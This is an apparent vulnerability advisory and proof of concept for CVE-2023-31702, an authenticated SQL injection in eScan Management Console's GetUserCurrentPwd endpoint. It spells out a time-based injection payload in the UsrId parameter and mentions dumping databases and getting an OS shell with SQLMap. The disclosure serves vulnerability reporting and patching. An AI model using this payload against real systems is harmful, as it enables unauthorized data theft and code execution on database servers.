Headline
eScan Management Console 14.0.1400.2281 SQL Injection
eScan Management Console version 14.0.1400.2281 suffers from a remote SQL injection vulnerability.
# Exploit Title: eScan Management Console 14.0.1400.2281 - SQL Injection (Authenticated)# Date: 16/05/2023# Exploit Author: Sahil Ojha# Vendor Homepage: https://www.escanav.com# Software Link: https://cl.escanav.com/ewconsole.dll# Version: 14.0.1400.2281# Tested on: Windows# CVE : CVE-2023-31702*Step of Reproduction/Proof of concept(POC)*1. Login into the escan management console with a valid username andpassword as root user.2. Navigate to URL:https://cl.escanav.com/ewconsole/ewconsole.dll/GetUserCurrentPwd?UsrId=1&cnt=41763. Inject the payload into the UsrId parameter to confirm the SQLinjection as shown below:https://cl.escanav.com/ewconsole/ewconsole.dll/GetUserCurrentPwd?UsrId=1;WAITFORDELAY '0:0:5'--&cnt=41764. The time delay of 5 seconds confirmed that "UsrId" parameter wasvulnerable to SQL Injection. Furthermore, it was also possible to dumpall the databases and inject OS shell directly into the MS SQL Serverusing SQLMap tool.Related news
CVE-2023-31702: CVE-2023-31702/README.md at main · sahiloj/CVE-2023-31702
SQL injection in the View User Profile in MicroWorld eScan Management Console 14.0.1400.2281 allows remote attacker to dump entire database and gain windows XP command shell to perform code execution on database server via GetUserCurrentPwd?UsrId=1.